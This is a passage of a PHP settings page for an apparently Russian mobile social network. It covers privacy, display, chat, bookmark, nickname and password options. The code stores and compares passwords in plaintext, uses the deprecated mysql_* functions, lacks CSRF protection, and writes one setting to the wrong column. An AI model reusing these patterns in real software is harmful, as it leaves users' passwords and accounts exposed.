Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Панель навигации |
Сменить ник | Личные смайлы NEW' . $div_end;
$_tran = ($user['translit'] == 1)
? 'Вкл'
: 'Выкл';
$_logo = ($user['home_logo'] == 1)
? 'Вкл'
: 'Выкл';
$_avka = ($user['avka'] == 1)
? 'Вкл'
: 'Выкл';
$_adult = ($user['adult'] == 1)
? 'Вкл'
: 'Выкл';
$_icon = ($user['menu_icon'] == 1)
? 'Вкл'
: 'Выкл';
echo 'Транслит: ' . $_tran . '
Логотип: ' . $_logo . '
Цвет ника
' . PreviewGrad($user['id']) . '
Иконки в меню: ' . $_icon . '
Показ маленьких аватаров: ' . $_avka . '
Показ эротического материала: ' . $_adult . '
';
echo $div_end;
break;
case translit:
if ($user['translit'] == 1) {
$_tr_1 = 'checked="checked"';
} elseif ($user['translit'] == 0) {
$_tr_2 = 'checked="checked"';
}
if (isset($_POST['save'])) {
$t = my_int($_POST['t']);
$value = ($t == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `translit` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?');
}
echo $div_left . $div_title . 'Транслит' . $div_end . $div_razdel . '
Транслит нужен тем пользователям, у которых нет на телефоне русских букв.
Если транслит включен, то все латинские буквы будут изменяться на кириллицу.
Правила транслита' . $div_end . '
' . $div_end;
break;
case menu_icon:
if ($user['menu_icon'] == 1) {
$_lg_1 = 'checked="checked"';
} elseif ($user['menu_icon'] == 0) {
$_lg_2 = 'checked="checked"';
}
if (isset($_POST['save'])) {
$l = my_int($_POST['l']);
$value = ($l == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `menu_icon` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?');
}
echo $div_left . $div_title . 'Иконки в меню' . $div_end . '
Иконки в меню:
' . $div_end;
break;
case logo:
if ($user['home_logo'] == 1) {
$_lg_1 = 'checked="checked"';
} elseif ($user['home_logo'] == 0) {
$_lg_2 = 'checked="checked"';
}
if (isset($_POST['save'])) {
$l = my_int($_POST['l']);
$value = ($l == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `home_logo` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?' . $ref);
}
echo $div_left . $div_title . 'Показ логотипа' . $div_end . '
Показ логотипа на главной:
' . $div_end;
break;
case view_blank:
if ($user['avka'] == 1) {
$_av_1 = 'checked="checked"';
} elseif ($user['avka'] == 0) {
$_av_2 = 'checked="checked"';
}
if (isset($_POST['save'])) {
$a = my_int($_POST['a']);
$value = ($a == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `avka` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?');
}
echo $div_left . $div_title . 'Показ аватаров' . $div_end . '
Показ маленьких аватаров:
' . $div_end;
break;
case view_adult:
if ($user['adult'] == 1) {
$_ad_1 = 'checked="checked"';
} elseif ($user['adult'] == 0) {
$_ad_2 = 'checked="checked"';
}
if (isset($_POST['save'])) {
$a = my_int($_POST['a']);
$value = ($a == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `adult` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?');
}
echo $div_left . $div_title . 'Показ +18' . $div_end . '
Показ эротического материала без предупреждений:
' . $div_end;
break;
case chat:
echo $div_left . $div_title . 'Настройка чата' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
$sis = ($user['sistem_mes'] == 1) ? 'Вкл' : 'Выкл';
echo 'Сообщений на страницу: ' . $user['room_post'] . '
Время обновления: ' . $user['refresh'] . '
Уведомления: ' . $sis . $div_end;
break;
case chat_onp:
if (isset($_POST['save'])) {
$onp = my_int($_POST['onp']);
mysql_query("UPDATE `users` SET `room_post` = '$onp' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=chat');
}
if ($user['room_post'] == 5) $sl_1 = 'selected="selected"';
if ($user['room_post'] == 10) $sl_2 = 'selected="selected"';
if ($user['room_post'] == 15) $sl_3 = 'selected="selected"';
if ($user['room_post'] == 20) $sl_4 = 'selected="selected"';
if ($user['room_post'] == 25) $sl_5 = 'selected="selected"';
if ($user['room_post'] == 30) $sl_6 = 'selected="selected"';
echo $div_left . $div_title . 'Кол-во сообщений' . $div_end . '
Количество сообщений на страницу:
' . $div_end;
break;
case chat_update:
if (isset($_POST['save'])) {
$update = my_int($_POST['update']);
mysql_query("UPDATE `users` SET `refresh` = '$update' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=chat');
}
if ($user['refresh'] == 0) $sl_0 = 'selected="selected"';
if ($user['refresh'] == 5) $sl_1 = 'selected="selected"';
if ($user['refresh'] == 10) $sl_2 = 'selected="selected"';
if ($user['refresh'] == 15) $sl_3 = 'selected="selected"';
if ($user['refresh'] == 20) $sl_4 = 'selected="selected"';
if ($user['refresh'] == 25) $sl_5 = 'selected="selected"';
if ($user['refresh'] == 30) $sl_6 = 'selected="selected"';
echo $div_left . $div_title . 'Автообновление' . $div_end . '
Время обновления:
' . $div_end;
break;
case chat_ent:
if (isset($_POST['save'])) {
$chat_ent = my_int($_POST['chat_ent']);
$value = ($chat_ent == 1) ? 1 : 0;
mysql_query("UPDATE `users` SET `sistem_mes` = '$value' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=chat');
}
if ($user['sistem_mes'] == 1) {
$_ch_1 = 'checked="checked"';
} elseif ($user['sistem_mes'] == 0) {
$_ch_2 = 'checked="checked"';
}
echo $div_left . $div_title . 'Уведомления' . $div_end . '
Уведомления:
' . $div_end;
break;
case color:
if ($user['color'] == 0) $ch_0 = 'checked="checked"';
elseif ($user['color'] == 1) $ch_1 = 'checked="checked"';
elseif ($user['color'] == 2) $ch_2 = 'checked="checked"';
elseif ($user['color'] == 3) $ch_3 = 'checked="checked"';
elseif ($user['color'] == 4) $ch_4 = 'checked="checked"';
elseif ($user['color'] == 5) $ch_5 = 'checked="checked"';
elseif ($user['color'] == 6) $ch_6 = 'checked="checked"';
elseif ($user['color'] == 7) $ch_7 = 'checked="checked"';
elseif ($user['color'] == 8) $ch_8 = 'checked="checked"';
elseif ($user['color'] == 9) $ch_9 = 'checked="checked"';
elseif ($user['color'] == 10) $ch_10 = 'checked="checked"';
elseif ($user['color'] == 11) $ch_11 = 'checked="checked"';
elseif ($user['color'] == 12) $ch_12 = 'checked="checked"';
elseif ($user['color'] == 13) $ch_13 = 'checked="checked"';
if (isset($_POST['save'])) {
$color = my_int($_POST['color']);
mysql_query("UPDATE `users` SET `color` = '$color' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?' . $ref);
}
echo $div_left . $div_title . 'Цвет ника' . $div_end . '
' . $div_end;
break;
case pass:
echo $div_left . $div_title . 'Смена пароля' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник
' . $div_end;
if (isset($_POST['replace'])) {
$oldpass = check($_POST['oldpass']);
$newpass = check($_POST['newpass']);
$newpass2 = check($_POST['newpass2']);
if (!preg_match("!^[a-z0-9]+$!i", $oldpass)) $error .= 'В старом пароле обнаружены запрещенные знаки!';
elseif (!preg_match("!^[a-z0-9]+$!i", $newpass)) $error .= 'В новом пароле обнаружены запрещенные знаки!';
elseif (!preg_match("!^[a-z0-9]+$!i", $newpass2)) $error .= 'В новом пароле обнаружены запрещенные знаки!';
elseif (mb_strlen($newpass, 'UTF8') < 6) $error .= 'Пароль не должен быть короче шести символов!';
elseif (mb_strlen($newpass2, 'UTF8') < 6) $error .= 'Пароль не должен быть короче шести символов!';
elseif ($newpass !== $newpass2) $error .= 'Пароли не совпадают!';
elseif (is_numeric($newpass) || is_numeric($newpass2)) $error .= 'Слишком простой пароль, используйте буквы и цифры!';
elseif ($user['pass'] != $oldpass) $error .= 'Старый пароль введен не верно!';
if (empty($error)) {
mysql_query("UPDATE `users` SET `pass` = '$newpass' WHERE `id` = '$user[id]' LIMIT 1");
msg('Пароль успешно изменен! Авторизируйтесь заново.');
} else {
err($error);
}
}
echo '' . $div_end;
break;
case looks:
if(isset($_GET['design'])){
mysql_query("UPDATE `users` SET `design` = '".mysql_real_escape_string($_GET['design'])."' WHERE `id` = '{$user['id']}' ");
header("Location: ?do=looks");
}
echo $div_left . $div_title . 'Настройка отображения' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
echo $div_razdel . 'Тема оформления:
' . $div_end . $div_tworazdel;
echo ($user['design']=='green'?'
Синяя touch
Новогодняя
Зеленая':'
Синяя touch
Зеленая
Синия
'
). $div_end;
echo $div_razdel . 'Кол-во на страницу:
' . $div_end . $div_tworazdel . '
Комментариев: ' . $user['onp_comments'] . '
Файлов: ' . $user['onp_files'] . '
Фотоальбомов: ' . $user['onp_albums'] . '
Фотографий: ' . $user['onp_photos'] . '
Заметок: ' . $user['onp_favs'] . '
Тем форума: ' . $user['onp_themes'] . '
Сообщений(личка): ' . $user['onp_privats'] . '
Размер превью: ' . $user['onp_prevs'] . 'x' . $user['onp_prevs'] . $div_end;
echo $div_end;
break;
case onp_comments:
echo $div_left . $div_title . 'Кол-во комментариев' . $div_end;
if (isset($_POST['ok'])) {
$comm = my_int($_POST['comm']);
mysql_query("UPDATE `users` SET `onp_comments` = '$comm' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_files:
echo $div_left . $div_title . 'Кол-во файлов' . $div_end;
if (isset($_POST['ok'])) {
$fil = my_int($_POST['fil']);
mysql_query("UPDATE `users` SET `onp_files` = '$fil' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_albums:
echo $div_left . $div_title . 'Кол-во альбомов' . $div_end;
if (isset($_POST['ok'])) {
$albums = my_int($_POST['albums']);
mysql_query("UPDATE `users` SET `onp_albums` = '$albums' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_photos:
echo $div_left . $div_title . 'Кол-во фотографий' . $div_end;
if (isset($_POST['ok'])) {
$photos = my_int($_POST['photos']);
mysql_query("UPDATE `users` SET `onp_photos` = '$photos' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_favs:
echo $div_left . $div_title . 'Кол-во заметок' . $div_end;
if (isset($_POST['ok'])) {
$favs = my_int($_POST['favs']);
mysql_query("UPDATE `users` SET `onp_favs` = '$favs' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_themes:
echo $div_left . $div_title . 'Кол-во тем форума' . $div_end;
if (isset($_POST['ok'])) {
$themes = my_int($_POST['themes']);
mysql_query("UPDATE `users` SET `onp_themes` = '$themes' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_privats:
echo $div_left . $div_title . 'Кол-во сообщений' . $div_end;
if (isset($_POST['ok'])) {
$privats = my_int($_POST['privats']);
mysql_query("UPDATE `users` SET `onp_privats` = '$privats' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case onp_prevs:
echo $div_left . $div_title . 'Размер превью' . $div_end;
if (isset($_POST['ok'])) {
$prevs = my_int($_POST['prevs']);
mysql_query("UPDATE `users` SET `onp_prevs` = '$prevs' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=looks');
}
echo '
Назад';
echo $div_end;
break;
case privat:
echo $div_left . $div_title . 'Настройка приватности' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
$p_mail = ($user['p_mail'] == 1) ? 'Все' : 'Только друзья';
$p_wall = ($user['p_wall'] == 1) ? 'Все' : 'Только друзья';
$p_r_wall = ($user['p_r_wall'] == 1) ? 'Все' : 'Только друзья';
$p_group = ($user['p_group'] == 1) ? 'Все' : 'Только друзья';
$p_oko = ($user['p_oko'] == 1) ? 'Да' : 'Нет';
$p_guest = ($user['p_guest'] == 1) ? 'Да' : 'Нет';
if ($user['p_date'] == 1) {
$p_date = 'Все';
} elseif ($user['p_date'] == 0) {
$p_date = 'Только друзья';
} elseif ($user['p_date'] == 2) {
$p_date = 'Никто';
}
if ($user['p_status'] == 1) {
$p_status = 'Все';
} elseif ($user['p_status'] == 0) {
$p_status = 'Только друзья';
} elseif ($user['p_status'] == 2) {
$p_status = 'Никто';
}
if ($user['p_friends'] == 1) {
$p_friends = 'Все';
} elseif ($user['p_friends'] == 0) {
$p_friends = 'Только друзья';
} elseif ($user['p_friends'] == 2) {
$p_friends = 'Никто';
}
echo $div_razdel . 'Кто может
' . $div_end . $div_tworazdel . '
писать мне личные сообщения: ' . $p_mail . '
оставлять сообщения у меня на стене: ' . $p_wall . '
читать сообщения у меня на стене: ' . $p_r_wall . '
приглашать меня в группу: ' . $p_group . '
видеть мою дату рождения: ' . $p_date . '
видеть моё семейное положение: ' . $p_status . '
видеть моих друзей: ' . $p_friends . '
показывать меня всевидящему оку: ' . $p_oko . '
показывать меня в гостях: ' . $p_guest . $div_end;
echo $div_end;
break;
case p_mail:
echo $div_left . $div_title . 'Личные сообщения' . $div_end;
if (isset($_POST['ok'])) {
$mail = my_int($_POST['mail']);
mysql_query("UPDATE `users` SET `p_mail` = '$mail' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_mail'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_mail'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_wall:
echo $div_left . $div_title . 'Сообщения на стене' . $div_end;
if (isset($_POST['ok'])) {
$wall = my_int($_POST['wall']);
mysql_query("UPDATE `users` SET `p_wall` = '$wall' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_wall'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_wall'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_r_wall:
echo $div_left . $div_title . 'Чтение стены' . $div_end;
if (isset($_POST['ok'])) {
$wall = my_int($_POST['wall']);
mysql_query("UPDATE `users` SET `p_r_wall` = '$wall' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_r_wall'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_r_wall'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_group:
echo $div_left . $div_title . 'Приглашение в группу' . $div_end;
if (isset($_POST['ok'])) {
$group = my_int($_POST['group']);
mysql_query("UPDATE `users` SET `p_group` = '$group' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_group'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_group'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_date:
echo $div_left . $div_title . 'Дата рождения' . $div_end;
if (isset($_POST['ok'])) {
$date = my_int($_POST['date']);
mysql_query("UPDATE `users` SET `p_date` = '$date' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_date'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_date'] == 0) $ch_0 = 'checked="checked"';
if ($user['p_date'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_status:
echo $div_left . $div_title . 'Семейное положение' . $div_end;
if (isset($_POST['ok'])) {
$status = my_int($_POST['status']);
mysql_query("UPDATE `users` SET `p_status` = '$status' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_status'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_status'] == 0) $ch_0 = 'checked="checked"';
if ($user['p_status'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_friends:
echo $div_left . $div_title . 'Список друзей' . $div_end;
if (isset($_POST['ok'])) {
$friends = my_int($_POST['friends']);
mysql_query("UPDATE `users` SET `p_friends` = '$friends' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_friends'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_friends'] == 0) $ch_0 = 'checked="checked"';
if ($user['p_friends'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_oko:
echo $div_left . $div_title . 'Всевидящее око' . $div_end;
if (isset($_POST['ok'])) {
$oko = my_int($_POST['oko']);
mysql_query("UPDATE `users` SET `p_oko` = '$oko' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
if ($user['p_oko'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_oko'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case p_guest:
echo $div_left . $div_title . 'Показ в гостях' . $div_end;
if (isset($_POST['ok'])) {
$guest = my_int($_POST['guest']);
if (rat($user['id']) < 100) {
err('Для включение этой настройки у вас должно быть не менее 100% рейтинга!');
} else {
mysql_query("UPDATE `users` SET `p_guest` = '$guest' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=privat');
}
}
if ($user['p_guest'] == 1) $ch_1 = 'checked="checked"';
if ($user['p_guest'] == 0) $ch_0 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case lenta:
echo $div_left . $div_title . 'Настройка ленты' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
if (isset($_POST['ok'])) {
$fr_lenta_files = my_int($_POST['fr_lenta_files']);
$fr_lenta_photos = my_int($_POST['fr_lenta_photos']);
$fr_lenta_favs = my_int($_POST['fr_lenta_favs']);
$fr_lenta_status = my_int($_POST['fr_lenta_status']);
$fr_lenta_friends = my_int($_POST['fr_lenta_friends']);
$fr_lenta_groups = my_int($_POST['fr_lenta_groups']);
$my_lenta_files = my_int($_POST['my_lenta_files']);
$my_lenta_photos = my_int($_POST['my_lenta_photos']);
$my_lenta_favs = my_int($_POST['my_lenta_favs']);
$my_lenta_status = my_int($_POST['my_lenta_status']);
$my_lenta_friends = my_int($_POST['my_lenta_friends']);
$my_lenta_groups = my_int($_POST['my_lenta_groups']);
mysql_query("UPDATE `users` SET
`fr_lenta_files` = '$fr_lenta_files',
`fr_lenta_photos` = '$fr_lenta_photos',
`fr_lenta_favs` = '$fr_lenta_favs',
`fr_lenta_status` = '$fr_lenta_status',
`fr_lenta_friends` = '$fr_lenta_friends',
`fr_lenta_groups` = '$fr_lenta_groups',
`my_lenta_files` = '$my_lenta_files',
`my_lenta_photos` = '$my_lenta_photos',
`my_lenta_favs` = '$my_lenta_favs',
`my_lenta_status` = '$my_lenta_status',
`my_lenta_friends` = '$my_lenta_friends',
`my_lenta_groups` = '$my_lenta_groups'
WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=lenta');
}
$fr_lenta_files = ($user['fr_lenta_files'] == 1) ? 'checked="checked"' : '';
$fr_lenta_photos = ($user['fr_lenta_photos'] == 1) ? 'checked="checked"' : '';
$fr_lenta_favs = ($user['fr_lenta_favs'] == 1) ? 'checked="checked"' : '';
$fr_lenta_status = ($user['fr_lenta_status'] == 1) ? 'checked="checked"' : '';
$fr_lenta_friends = ($user['fr_lenta_friends'] == 1) ? 'checked="checked"' : '';
$fr_lenta_groups = ($user['fr_lenta_groups'] == 1) ? 'checked="checked"' : '';
$my_lenta_files = ($user['my_lenta_files'] == 1) ? 'checked="checked"' : '';
$my_lenta_photos = ($user['my_lenta_photos'] == 1) ? 'checked="checked"' : '';
$my_lenta_favs = ($user['my_lenta_favs'] == 1) ? 'checked="checked"' : '';
$my_lenta_status = ($user['my_lenta_status'] == 1) ? 'checked="checked"' : '';
$my_lenta_friends = ($user['my_lenta_friends'] == 1) ? 'checked="checked"' : '';
$my_lenta_groups = ($user['my_lenta_groups'] == 1) ? 'checked="checked"' : '';
echo $div_razdel . '
Оповещать друзей об обновлениях моей страницы, связанных с разделами:
' . $div_end . '
';
echo $div_end;
break;
case comms:
echo $div_left . $div_title . 'Настройка комментариев' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
if (isset($_POST['ok'])) {
$comm_files = my_int($_POST['comm_files']);
$comm_photos = my_int($_POST['comm_photos']);
$comm_groups = my_int($_POST['comm_groups']);
$comm_forum = my_int($_POST['comm_forum']);
$comm_wall = my_int($_POST['comm_wall']);
mysql_query("UPDATE `users` SET
`comm_files` = '$comm_files',
`comm_photos` = '$comm_photos',
`comm_groups` = '$comm_groups',
`comm_forum` = '$comm_forum',
`comm_wall` = '$comm_wall'
WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=comms');
}
$comm_files = ($user['comm_files'] == 1) ? 'checked="checked"' : '';
$comm_photos = ($user['comm_photos'] == 1) ? 'checked="checked"' : '';
$comm_groups = ($user['comm_groups'] == 1) ? 'checked="checked"' : '';
$comm_forum = ($user['comm_forum'] == 1) ? 'checked="checked"' : '';
$comm_wall = ($user['comm_wall'] == 1) ? 'checked="checked"' : '';
echo $div_razdel . '
Оповещать меня в ленте о комментариях в разделах:
' . $div_end . '
';
echo $div_end;
break;
case favs:
echo $div_left . $div_title . 'Настройка закладок' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
if ($user['fvr_user'] == 1) {
$fvr_user = 'Все';
} elseif ($user['fvr_user'] == 0) {
$fvr_user = 'Только друзья и контакты';
} elseif ($user['fvr_user'] == 2) {
$fvr_user = 'Никто';
}
if ($user['fvr_file'] == 1) {
$fvr_file = 'Все';
} elseif ($user['fvr_file'] == 0) {
$fvr_file = 'Только друзья и контакты';
} elseif ($user['fvr_file'] == 2) {
$fvr_file = 'Никто';
}
if ($user['fvr_album'] == 1) {
$fvr_album = 'Все';
} elseif ($user['fvr_album'] == 0) {
$fvr_album = 'Только друзья и контакты';
} elseif ($user['fvr_album'] == 2) {
$fvr_album = 'Никто';
}
if ($user['fvr_foto'] == 1) {
$fvr_foto = 'Все';
} elseif ($user['fvr_foto'] == 0) {
$fvr_foto = 'Только друзья и контакты';
} elseif ($user['fvr_foto'] == 2) {
$fvr_foto = 'Никто';
}
if ($user['fvr_note'] == 1) {
$fvr_note = 'Все';
} elseif ($user['fvr_note'] == 0) {
$fvr_note = 'Только друзья и контакты';
} elseif ($user['fvr_note'] == 2) {
$fvr_note = 'Никто';
}
if ($user['fvr_them'] == 1) {
$fvr_them = 'Все';
} elseif ($user['fvr_them'] == 0) {
$fvr_them = 'Только друзья и контакты';
} elseif ($user['fvr_them'] == 2) {
$fvr_them = 'Никто';
}
echo $div_razdel . '
Кто может смотреть мои закладки:
' . $div_end . $div_tworazdel . '
Люди: ' . $fvr_user . '
Файлы: ' . $fvr_file . '
Фотоальбомы: ' . $fvr_album . '
Фотографии: ' . $fvr_foto . '
Заметки: ' . $fvr_note . '
Темы форума: ' . $fvr_them . $div_end;
echo $div_end;
break;
case fvr_user:
echo $div_left . $div_title . 'Люди' . $div_end;
if (isset($_POST['ok'])) {
$fvr_user = my_int($_POST['fvr_user']);
mysql_query("UPDATE `users` SET `fvr_user` = '$fvr_user' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_user'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_user'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_user'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case fvr_file:
echo $div_left . $div_title . 'Файлы' . $div_end;
if (isset($_POST['ok'])) {
$fvr_file = my_int($_POST['fvr_file']);
mysql_query("UPDATE `users` SET `fvr_file` = '$fvr_file' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_file'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_file'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_file'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case fvr_album:
echo $div_left . $div_title . 'Альбомы' . $div_end;
if (isset($_POST['ok'])) {
$fvr_album = my_int($_POST['fvr_album']);
mysql_query("UPDATE `users` SET `fvr_album` = '$fvr_album' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_album'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_album'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_album'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case fvr_foto:
echo $div_left . $div_title . 'Фото' . $div_end;
if (isset($_POST['ok'])) {
$fvr_foto = my_int($_POST['fvr_foto']);
mysql_query("UPDATE `users` SET `fvr_foto` = '$fvr_foto' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_foto'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_foto'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_foto'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case fvr_note:
echo $div_left . $div_title . 'Заметки' . $div_end;
if (isset($_POST['ok'])) {
$fvr_note = my_int($_POST['fvr_note']);
mysql_query("UPDATE `users` SET `fvr_note` = '$fvr_note' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_note'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_note'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_note'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case fvr_them:
echo $div_left . $div_title . 'Темы форума' . $div_end;
if (isset($_POST['ok'])) {
$fvr_them = my_int($_POST['fvr_them']);
mysql_query("UPDATE `users` SET `fvr_note` = '$fvr_them' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=favs');
}
if ($user['fvr_them'] == 1) $ch_1 = 'checked="checked"';
if ($user['fvr_them'] == 0) $ch_0 = 'checked="checked"';
if ($user['fvr_them'] == 2) $ch_2 = 'checked="checked"';
echo '
Назад';
echo $div_end;
break;
case nick:
echo $div_left . $div_title . 'Настройка' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
if (isset($_POST['ok'])) {
$login = trim(mysql_real_escape_string(check($_POST['login'])));
$first_l = mb_substr($login, 0, 1, 'UTF8');
$last_l = mb_substr($login, -1, 1, 'UTF8');
$latuser = mb_strtolower($login, 'UTF8');
$sql = mysql_query("SELECT `id` FROM `users` WHERE `latuser` = '$latuser' AND `id` != '$login' LIMIT 1");
if (!preg_match('#^([a-z1-9_])+$#ui', $login)) $error .= 'Ник может содержать только знаки латинского алфавита, знак _ и цифры(кроме 0)';
elseif (!preg_match('#^([a-z1-9])+$#ui', $first_l)) $error .= 'Ник должен начинаться с латинской буквы или цифры!';
elseif (!preg_match('#^([a-z1-9])+$#ui', $last_l)) $error .= 'Ник должен заканчиваться латинской буквой или цифрой!';
elseif (mysql_num_rows($sql)) $error .= 'Указанный Вами ник ' . $login . ' уже занят!';
elseif (mb_strlen($login, 'UTF-8') < 4) $error .= 'Ник не должен содержать менее 4х знаков!';
elseif (mb_strlen($login, 'UTF-8') > 15) $error .= 'Ник не должен превышать 15 знаков!';
elseif (ctype_digit($login)) $error .= 'Ник не должен состоять из одних цифр!';
if ($user['balls'] < 30) $error .= 'Извините, но у Вас недостаточно бубликов для смены ника!';
if (empty($error)) {
mysql_query("UPDATE `users` SET `user` = '$login' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=nick');
} else {
err($error);
}
}
echo $div_razdel . '
В целях вашей безопасности, мы не смогли сделать смену ника бесплатной.
Стоимость смены ника: 30
' . $div_end . '
Ник:
';
echo $div_end;
break;
case retpass:
echo $div_left . $div_title . 'Секретный вопрос' . $div_end . $div_menu . '
Основное |
Сменить пароль |
Настройки отображения |
Приватность |
Лента |
Комментарии |
Закладки |
Настройки чата |
Секретный вопрос |
Сменить ник' . $div_end;
if (isset($_POST['ok'])) {
$ret = my_int($_POST['ret']);
$answer = trim(mysql_real_escape_string(check($_POST['answer'])));
if (!empty($ret) && empty($answer)) {
err('Не заполнен секретный ответ!');
} elseif (empty($ret)) {
mysql_query("UPDATE `users` SET `quest` = '0', `answer` = '' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=retpass');
} else {
mysql_query("UPDATE `users` SET `quest` = '$ret', `answer` = '$answer' WHERE `id` = '$user[id]' LIMIT 1");
header('Location: settings.php?do=retpass');
}
}
if ($user['quest'] == 1) {
